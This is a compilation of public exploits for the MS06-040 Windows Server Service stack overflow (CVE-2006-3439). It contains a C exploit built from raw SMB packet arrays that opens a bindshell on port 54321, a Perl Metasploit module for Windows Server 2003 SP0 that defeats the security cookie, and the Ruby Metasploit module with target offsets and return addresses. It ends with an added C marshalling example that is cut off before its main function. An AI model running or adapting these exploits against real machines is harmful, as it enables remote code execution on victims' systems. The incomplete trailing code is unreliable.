0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, 
0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, 
0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, 
0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, 
0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, 
0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, 
0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, 
0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, 
0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, 
0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, 
0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, 
0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, 
0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, 
0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, 
0x7c, 0x45, 0x8e };

char peer0_12[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, 
0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, 
0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, 
0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, 
0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, 
0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, 
0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, 
0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, 
0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, 
0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, 
0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, 
0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, 
0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, 
0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, 
0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, 
0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, 
0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, 
0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, 
0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, 
0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, 
0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, 
0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, 
0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, 
0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, 
0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, 
0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, 
0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, 
0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, 
0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, 
0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, 
0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, 
0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, 
0x52, 0x66, 0x79 };

char peer0_13[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, 
0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, 
0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, 
0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, 
0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, 
0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, 
0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, 
0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, 
0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, 
0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, 
0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, 
0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, 
0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, 
0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, 
0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, 
0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, 
0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, 
0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, 
0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, 
0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, 
0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, 
0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, 
0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, 
0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, 
0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, 
0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, 
0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, 
0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, 
0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, 
0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, 
0x00, 0x00, 0x00 };

char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 
0x00, 0x00 };


int main(int argc,char **argv)
{

int fd;
int con;
int repbf[20000];

struct sockaddr_in target;


if(argc < 2)
{

printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
printf("Win2k should give a crash in services.exe\n");
printf("I've used the default smbdomain: WORKGROUP\n\n");
printf("Usage: %s <ip>\n",argv[0]);
printf("Example: %s 192.168.1.103\n\n",argv[0]);
printf("Written by: Preddy\n");
printf("RootShell Security Group\n");
printf("www.team-rootshell.com\n");

exit(1);

}

fd = socket(AF_INET,SOCK_STREAM,0);

if(fd < 0)
{

perror("Could not create socket\n");
exit(1);
}

printf("Target: %s\n",argv[1]);

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port = htons(PORT);

con = connect(fd,(struct sockaddr_in *)&target,sizeof(target));

if(con < 0)
{

printf("Could not connect\n");
exit(1);
}

sendto(fd,peer0_0,sizeof(peer0_0),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_1,sizeof(peer0_1),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_2,sizeof(peer0_2),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_3,sizeof(peer0_3),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_4,sizeof(peer0_4),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_5,sizeof(peer0_5),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_6,sizeof(peer0_6),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_7,sizeof(peer0_7),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_8,sizeof(peer0_8),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_9,sizeof(peer0_9),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_10,sizeof(peer0_10),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_11,sizeof(peer0_11),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_12,sizeof(peer0_12),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_13,sizeof(peer0_13),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_14,sizeof(peer0_14),0,&target,sizeof(target));

printf("Attack Finished: now open a new terminal and nc to your victim on port 54321\n");
printf("Warning: Don't close this window!\n");

read(fd,repbf,sizeof(repbf));

printf("Done..\n");

close(fd);

}

// milw0rm.com [2006-08-19]

- Vulnerability information (2355)

MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) (EDBID:2355)
Platform: windows  Type: remote
Date: 2006-09-13  Verified
Port: 445  Author: Trirat Puttaraksa
#########################################################################
# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
# 
# For educational purpose only
#
# Note: This exploit is developed because of my question "Is it exploitable
# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not 
# exploitable ? There is Stack Protection Windows Server 2003, is this the
# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
#
# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
# ^-^) and work on it. The problem is the Stack Protection "security cookie 
# checking". Because wcscpy() method allow me to write to any memory location
# that are marked writable, I decide to write to the location at "security
# cookie" is stored and it works !!! I will describe more implementation details
# in my blog in few days ^-^ 
#
# This exploit tested on Windows Server 2003 SP0 build 3790 and successful 
# exploit 2003 machine in my environment - all patch before MS06-040 
# (KB921883). It's quite reliable but not 100%. There is the possibility that
# the exploit will fail and the target system process crash. Because I have 
# only one testbase system, I couldn't confirm this exploit will work on 
# your environment. However feel free to e-mail to me.
#
# Credits: H D Moore
#########################################################################

package Msf::Exploit::netapi_win2003;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
	'Name'    => 'MSO6-040 Windows Server 2003 Target',
	'Version' => '',
	'Authors' =>
	  [
		'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
	  ],

	'Arch' => ['x86'],
	'OS'   => [ 'win32', 'win2003' ],
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	
	'UserOpts' =>
	  {
		'RHOST' => [ 1, 'ADDR', 'The target address' ],

		# SMB connection options
		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
	  },

	'Payload' =>
	  {
	  	# Technically we can use more space than this, but by limiting it
		# to 370 bytes we can use the same request for all Windows SPs.
		'Space'    => 370,
		
		'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
		'Keys'     => ['+ws2ord'],

		# sub esp, 4097 + inc esp makes stack happy
		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
	  },

	'Description' => Pex::Text::Freeform(
		qq{
		This exploit modified from netapi_ms06_040.pm (Metasploit).
		While netapi_ms06_040 of metasploit works on Windows 2000 
		SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
		Windows Server 2003 SP0.
	  }
	  ),

	'Refs' =>
	  [
		[ 'BID', '19409' ],
		[ 'CVE', '2006-3439' ],
		[ 'MSB', 'MS06-040' ],
	  ],

	'DefaultTarget' => 0,
	'Targets'       =>
	  [
		[ '(wcscpy) Windows Server 2003 SP0', 612],
	  ],

	'Keys' => ['srvsvc'],

	'DisclosureDate' => '',
  };

sub new {
	my ($class) = @_;
	my $self =
	  $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
	return ($self);
}

sub Exploit {
	my ($self)      = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target_name = '*SMBSERVER';

	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];

	if (!$self->InitNops(128)) {
		$self->PrintLine("Could not initialize the nop module");
		return;
	}

	my ( $res, $rpc );

	my $pipe    = '\BROWSER';
	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
	my $version = '3.0';

	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

	my $dce = Pex::DCERPC->new(
		'handle'      => $handle,
		'username'    => $self->GetVar('SMBUSER'),
		'password'    => $self->GetVar('SMBPASS'),
		'domain'      => $self->GetVar('SMBDOM'),
		'fragsize'    => $self->GetVar('FragSize'),
		'bindevasion' => $self->GetVar('BindEvasion'),
		'directsmb'   => $self->GetVar('DirectSMB'),
	  );

	if ( !$dce ) {
		$self->PrintLine("[*] Could not bind to $handle");
		return;
	}

	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	
	if (! $smb) {
		$self->PrintLine("[*] Could not establish SMB session");
		return;
	}

	my $stub;

	#
	# Use the wcscpy() method on Windows Server 2003 SP0
	#	
	if ($target->[0] =~ /2003/) {

		my $path = 	
			$shellcode.

			# Padding
			Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
			Pex::Text::AlphaNumText(32).
			substr($shellcode, 0, 4).	# cookie
			Pex::Text::AlphaNumText(4).
			# return address == address where the security cookie is stored
			("\xec\xc1\xc8\x71") . 
			Pex::Text::AlphaNumText(8).

			("\xec\xc1\xc8\x71" x 2) .
			Pex::Text::AlphaNumText(36).

			# Terminate
			"\x00\x00";


		# Package that into a stub
		$stub =
			Pex::NDR::Long(int(rand(0xffffffff))).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::Long(0);
	}
	else {
		$self->PrintLine("This target is not currently supported");
		return;
	}


	$self->PrintLine("[*] Sending request...");
	
	# Function 0x1f is not the only way to exploit this :-)
	my @response = $dce->request( $handle, 0x1f, $stub );
	
	if ( length($dce->{'response'}->{'StubData'}) > 0) {
		$self->PrintLine("[*] The server rejected it, trying again...");
		@response = $dce->request( $handle, 0x1f, $stub );
	}
	
	if ( length($dce->{'response'}->{'StubData'}) > 0) {
		$self->PrintLine("[*] Exploit Failed");
	}
	
	if (@response) {
		$self->PrintLine('[*] RPC server responded with:');
		foreach my $line (@response) {
			$self->PrintLine( '[*] ' . $line );
		}
	}

	return;
}

1;

# milw0rm.com [2006-09-13]
		

- Vulnerability Information (16367)

Microsoft Server Service NetpwPathCanonicalize Overflow (EDBID:16367)
windows remote
2011-02-17 Verified
0 metasploit
##
# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Server Service NetpwPathCanonicalize Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function
				using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
				other RPC calls could be used to exploit this service. This exploit will result in
				a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
				will likely result in a complete reboot on Windows 2000 and the termination of all
				SMB-related services on Windows XP. The default target for this exploit should succeed
				on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
			},
			'Author'         =>
				[
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11762 $',
			'References'     =>
				[
					[ 'CVE', '2006-3439' ],
					[ 'OSVDB', '27845' ],
					[ 'BID', '19409' ],
					[ 'MSB', 'MS06-040' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					# Technically we can use more space than this, but by limiting it
					# to 370 bytes we can use the same request for all Windows SPs.
					'Space'    => 370,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        =>
				[
					[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],
					[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',
						{
							'Offset' => 1000,
							'Ret'    => 0x00020804
						}
					],
					[ '(wcscpy) Windows XP SP0/SP1',
						{
							'Offset' => 612,
							'Ret'    => 0x00020804
						}
					],
					[ '(stack)  Windows XP SP1 English',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71ab1d54 # jmp esp @ ws2_32.dll
						}
					],
					[ '(stack)  Windows XP SP1 Italian',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71a37bfb # jmp esp @ ws2_32.dll
						}
					],
					[ '(wcscpy) Windows 2003 SP0',
						{
							'Offset' => 612,
							'Ret'    => 0x00020804
						}
					],
				],

			'DisclosureDate' => 'Aug 8 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
			], self.class)

	end

	def exploit

		connect()
		smb_login()

		mytarget = target
		if (not target) or (target.name =~ /Automatic/)
			case smb_peer_os()
				when 'Windows 5.0'
					print_status("Detected a Windows 2000 target")
					mytarget = targets[1]

				when 'Windows NT 4.0'
					print_status("Detected a Windows NT 4.0 target")
					mytarget = targets[1]

				when 'Windows 5.1'
					begin
						smb_create("\\SRVSVC")
						print_status("Detected a Windows XP SP0/SP1 target")
					rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
						if (e.error_code == 0xc0000022)
							print_status("Windows XP SP2 is not exploitable")
							return
						end
						print_status("Detected a Windows XP target (unknown patch level)")
					end
					mytarget = targets[2]

				when /Windows Server 2003 (\d+)$/
					print_status("Detected a Windows 2003 SP0 target")
					mytarget = targets[5]

				when /Windows Server 2003 (\d+) Service Pack (\d+)/
					print_status("Windows 2003 SP#{$2} is not exploitable")
					return

				when /Samba/
					print_status("Samba is not vulnerable")
					return

				else
					print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
					return
			end
		end

		# Specific fixups for Windows NT
		case smb_peer_os()
		when 'Windows NT 4.0'
			print_status("Adjusting the SMB/DCERPC parameters for Windows NT")
			datastore['SMB::pipe_write_min_size'] = 2048
			datastore['SMB::pipe_write_max_size'] = 4096
		end

		handle = dcerpc_handle(
			'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		#
		#  /* Function 0x1f at 0x767e912c */
		#  long function_1f (
		#    [in] [unique] [string] wchar_t * arg_00,
		#    [in] [string] wchar_t * arg_01,
		#    [out] [size_is(arg_03)] char * arg_02,
		#    [in] [range(0, 64000)] long arg_03,
		#    [in] [string] wchar_t * arg_04,
		#    [in,out] long * arg_05,
		#    [in] long arg_06
		#  );
		#

		print_status("Building the stub data...")
		stub = ''

		case mytarget.name

		# This covers NT 4.0 as well
		when /wcscpy.*Windows 2000/

			code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded

			path = code + ( [mytarget.ret].pack('V') * 16 ) + "\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(250)+1) +
				NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") +
				NDR.long(rand(250)+1) +
				NDR.long(0)

		when /wcscpy.*Windows XP/
			path =
				# Payload goes first
				payload.encoded +

				# Padding
				rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +

				# Land 6 bytes in to bypass garbage (XP SP0)
				[ mytarget.ret + 6 ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode (XP SP0)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(32) +

				# Jump straight to shellcode (XP SP1)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode (XP SP1)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(32) +

				# Terminate the path
				"\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)


		when /stack/
			buff = rand_text_alphanumeric(800)
			buff[0, payload.encoded.length] = payload.encoded
			buff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')
			buff[ mytarget['OffsetB'], 5 ] = "\xe9" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')

			path = "\\\x00\\\x00" + buff + "\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)


		when /wcscpy.*Windows 2003/
			path =
				# Payload goes first
				payload.encoded +

				# Padding
				rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +

				# Padding
				rand_text_alphanumeric(32) +

				# The cookie is constant,
				# noticed by Nicolas Pouvesle in Misc #28
				"\x4e\xe6\x40\xbb" +

				# Padding
				rand_text_alphanumeric(4) +

				# Jump straight to shellcode
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(40) +

				# Terminate the path
				"\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)

		end

		print_status("Calling the vulnerable function...")

		begin
			dcerpc.call(0x1f, stub, false)
			dcerpc.call(0x1f, stub, false)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
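The IDL comment and the stub assembly in the module above are the entire wire format of the request, but Rex's NDR helpers hide the byte layout. The following C is an added example written for this page, not Metasploit or Rex code: it marshals the same seven-argument NetpwPathCanonicalize request by hand (referent id for the [unique] server-name pointer, two conformant varying UTF-16LE strings, the longs; the [out] buffer arg_02 is not sent), and it includes a parser that reads the path argument's actual_count back out of a captured stub, which is the field a length-based detection for this bug would threshold on (the module's Offset values, 612 and 1000, show how long the path has to be). The function names, the referent id 0x20000, the output size 0x40, path type 1, flags 0 and the sample path "a\b" are assumptions for illustration.

```c
#include <stdint.h>
#include <string.h>

/* Added example, not Metasploit or Rex code: the srvsvc opnum 0x1f
 * (NetpwPathCanonicalize) request marshalled by hand, in the field order of
 * the module's IDL comment ([out] arg_02 is not sent). Referent id, output
 * size, path type, flags and the sample path are assumed values. */

static size_t ndr_long(uint8_t *out, uint32_t v)   /* NDR.long: 32-bit LE */
{
    out[0] = (uint8_t)v; out[1] = (uint8_t)(v >> 8); out[2] = (uint8_t)(v >> 16); out[3] = (uint8_t)(v >> 24);
    return 4;
}

static uint32_t rd_long(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Size of a conformant varying string of 'units' UTF-16 code units:
 * max_count, offset, actual_count (12 bytes), data, padding to 4. */
static size_t ndr_ucvs_len(size_t units)
{
    return (12 + units * 2 + 3) & ~(size_t)3;
}

/* Conformant varying UTF-16LE string. 'units' counts the terminating NUL when
 * the caller included one (NDR.UnicodeConformantVaryingString appends it;
 * the ...PreBuilt variant sends raw bytes, hence the module's "\x00\x00"). */
static size_t ndr_ucvs(uint8_t *out, const uint8_t *data, size_t units)
{
    size_t n = 0;
    n += ndr_long(out + n, (uint32_t)units);   /* max_count */
    n += ndr_long(out + n, 0);                 /* offset */
    n += ndr_long(out + n, (uint32_t)units);   /* actual_count */
    memcpy(out + n, data, units * 2);
    n += units * 2;
    while (n % 4) out[n++] = 0;                /* NDR.align */
    return n;
}

static const uint8_t EMPTY_WSTR[2] = { 0, 0 };   /* '' plus its NUL: one unit */

/* Request stub: referent id + server name, path, output size, prefix,
 * in/out path type, flags. Returns bytes written, or 0 if 'cap' is too small. */
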